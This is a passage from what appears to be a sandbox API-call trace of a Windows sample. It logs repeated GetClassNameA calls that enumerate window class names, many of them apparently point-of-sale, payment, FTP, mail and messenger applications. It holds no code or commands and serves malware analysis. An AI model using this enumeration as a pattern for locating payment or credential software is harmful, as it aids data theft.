lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0096.407] GetClassNameA (in: hWnd=0x10170, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0096.408] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100a4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100a8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100b4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100be, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10098, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100bc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10080, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0096.408] GetClassNameA (in: hWnd=0x20048, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0096.408] GetClassNameA (in: hWnd=0x100d6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0096.408] GetClassNameA (in: hWnd=0x302c2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0096.408] GetClassNameA (in: hWnd=0x302b2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0096.408] GetClassNameA (in: hWnd=0x202ce, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0096.409] GetClassNameA (in: hWnd=0x202d8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0471A7A0-8903f25") returned 28 [0096.409] GetClassNameA (in: hWnd=0xf0070, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0096.409] GetClassNameA (in: hWnd=0x202c4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.409] GetClassNameA (in: hWnd=0x10374, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.409] GetClassNameA (in: hWnd=0x10368, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0096.409] GetClassNameA (in: hWnd=0x10366, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="smartftpwin") returned 11 [0096.409] GetClassNameA (in: hWnd=0x10362, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="winscp_") returned 7 [0096.409] GetClassNameA (in: hWnd=0x10364, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="active-charge") returned 13 [0096.409] GetClassNameA (in: hWnd=0x10360, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="skypecls") returned 8 [0096.409] GetClassNameA (in: hWnd=0x1035e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="scriptftp_win") returned 13 [0096.409] GetClassNameA (in: hWnd=0x10300, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="webdrivecls") returned 11 [0096.409] GetClassNameA (in: hWnd=0x102f6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="centralcreditcard") returned 17 [0096.409] GetClassNameA (in: hWnd=0x102f4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="omniposwnd") returned 10 [0096.409] GetClassNameA (in: hWnd=0x102f2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Societypositionmyselfapp") returned 24 [0096.409] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="outlookwindow") returned 13 [0096.410] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="yahoomessenger_cls") returned 18 [0096.410] GetClassNameA (in: hWnd=0x1031c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="trilliancls") returned 11 [0096.410] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="isspos_win") returned 10 [0096.410] GetClassNameA (in: hWnd=0x1031a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="whatsapp_cls") returned 12 [0096.410] GetClassNameA (in: hWnd=0x10318, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="spgagentserviceapp") returned 18 [0096.410] GetClassNameA (in: hWnd=0x10316, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="notepadclass") returned 12 [0096.410] GetClassNameA (in: hWnd=0x10314, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="afr38_cls") returned 9 [0096.410] GetClassNameA (in: hWnd=0x10312, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="edcsvrcls") returned 9 [0096.410] GetClassNameA (in: hWnd=0x10310, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="fpos_wnd") returned 8 [0096.410] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="creditservice_") returned 14 [0096.410] GetClassNameA (in: hWnd=0x1030c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ccv_servercls") returned 13 [0096.410] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="accuposwin") returned 10 [0096.410] GetClassNameA (in: hWnd=0x10308, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0096.410] GetClassNameA (in: hWnd=0x10306, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="mxslipstreamapp") returned 15 [0096.410] GetClassNameA (in: hWnd=0x10304, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="utg2app") returned 7 [0096.410] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="thunderbirdwnd") returned 14 [0096.410] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Heavy_") returned 6 [0096.410] GetClassNameA (in: hWnd=0x10302, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="spcwincls") returned 9 [0096.411] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="May_Various_wnd") returned 15 [0096.411] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="operamail_win") returned 13 [0096.411] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ncftpwin") returned 8 [0096.411] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="leechftp_app") returned 12 [0096.411] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="fling_win") returned 9 [0096.411] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="icq_win") returned 7 [0096.411] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0096.411] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="foxmailincmail_class") returned 20 [0096.411] GetClassNameA (in: hWnd=0x10298, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="flashfxp_") returned 9 [0096.411] GetClassNameA (in: hWnd=0x10282, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="farwindow") returned 9 [0096.411] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="filezilla_app") returned 13 [0096.411] GetClassNameA (in: hWnd=0x10278, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="bitkinex_cls") returned 12 [0096.411] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="coreftp_wnd") returned 11 [0096.411] GetClassNameA (in: hWnd=0x10266, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="absolutetelnet_") returned 15 [0096.411] GetClassNameA (in: hWnd=0x10264, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="alftpwindow") returned 11 [0096.411] GetClassNameA (in: hWnd=0x10268, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="barcaapp") returned 8 [0096.411] GetClassNameA (in: hWnd=0x10258, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="3dftp") returned 5 [0096.412] GetClassNameA (in: hWnd=0x10250, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="agree_Interesting_receive_window") returned 32 [0096.412] GetClassNameA (in: hWnd=0x10248, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="program_Him_cell_wnd") returned 20 [0096.412] GetClassNameA (in: hWnd=0x10240, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Gardenpoliticalclass") returned 20 [0096.412] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="long_Sense_class") returned 16 [0096.412] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Memberheavyclass") returned 16 [0096.412] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="movementIndeedbestcls") returned 21 [0096.412] GetClassNameA (in: hWnd=0x10230, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="executiveAnythingwnd") returned 20 [0096.412] GetClassNameA (in: hWnd=0x10226, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Condition_cls") returned 13 [0096.412] GetClassNameA (in: hWnd=0x10228, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="abilitywhereOperation") returned 21 [0096.412] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="director_glass_possible_win") returned 27 [0096.412] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Acceptclass") returned 11 [0096.412] GetClassNameA (in: hWnd=0x10214, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Something_victim_window") returned 23 [0096.412] GetClassNameA (in: hWnd=0x10200, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="instead_Recent_win") returned 18 [0096.412] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Whole_class") returned 11 [0096.412] GetClassNameA (in: hWnd=0x10206, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="youngeveryMomentwindow") returned 22 [0096.412] GetClassNameA (in: hWnd=0x10204, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="SideEndDeathcls") returned 15 [0096.412] GetClassNameA (in: hWnd=0x201e6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="nation_choose_app") returned 17 [0096.412] GetClassNameA (in: hWnd=0x40148, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="partner_app") returned 11 [0096.412] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="FactBelieveWorkerwin") returned 20 [0096.412] GetClassNameA (in: hWnd=0x501d2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="onLawyerseekwnd") returned 15 [0096.413] GetClassNameA (in: hWnd=0x201b4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x30036, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.413] GetClassNameA (in: hWnd=0x30072, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.413] GetClassNameA (in: hWnd=0x501de, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0096.413] GetClassNameA (in: hWnd=0x20208, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.413] GetClassNameA (in: hWnd=0x302ca, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x3011c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0096.413] GetClassNameA (in: hWnd=0x20084, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0096.413] GetClassNameA (in: hWnd=0x20122, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0096.413] GetClassNameA (in: hWnd=0x301e2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x201fa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x101be, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0096.413] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0096.413] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0096.413] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0096.413] GetClassNameA (in: hWnd=0x10110, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.413] GetClassNameA (in: hWnd=0x10118, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0096.414] GetClassNameA (in: hWnd=0x20152, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x10116, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0096.414] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0096.414] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x100f0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0096.414] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0096.414] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0096.414] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x100e4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x200da, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.414] GetClassNameA (in: hWnd=0x20040, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0096.414] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0096.414] GetClassNameA (in: hWnd=0x20030, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0096.414] GetClassNameA (in: hWnd=0x2002e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0096.414] GetClassNameA (in: hWnd=0x40038, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.414] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.415] GetClassNameA (in: hWnd=0x101c8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.415] GetClassNameA (in: hWnd=0x100ac, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0096.415] GetClassNameA (in: hWnd=0x10078, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0096.415] GetClassNameA (in: hWnd=0x10074, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0096.415] GetClassNameA (in: hWnd=0x10022, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0096.415] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0096.415] GetClassNameA (in: hWnd=0x502ae, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0096.415] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0096.415] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x10160, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x10150, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x10178, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0096.415] GetClassNameA (in: hWnd=0x10082, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x302e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x60380, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x202ba, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x10372, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.415] GetClassNameA (in: hWnd=0x10370, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.416] GetClassNameA (in: hWnd=0x1036e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x501ce, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1036c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1035a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10358, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10356, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10354, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10352, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10350, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1034c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x1034a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10348, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10346, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.417] GetClassNameA (in: hWnd=0x10344, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10342, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10340, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10338, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10336, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10334, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10332, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10330, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.418] GetClassNameA (in: hWnd=0x10328, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10326, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10324, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10322, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10320, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10290, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10274, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10272, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10260, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10252, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10246, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.419] GetClassNameA (in: hWnd=0x10244, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10238, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10236, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10232, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10220, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10216, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10210, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x201d8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x201e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x3018c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x30194, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x101c0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x10190, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.420] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0096.421] 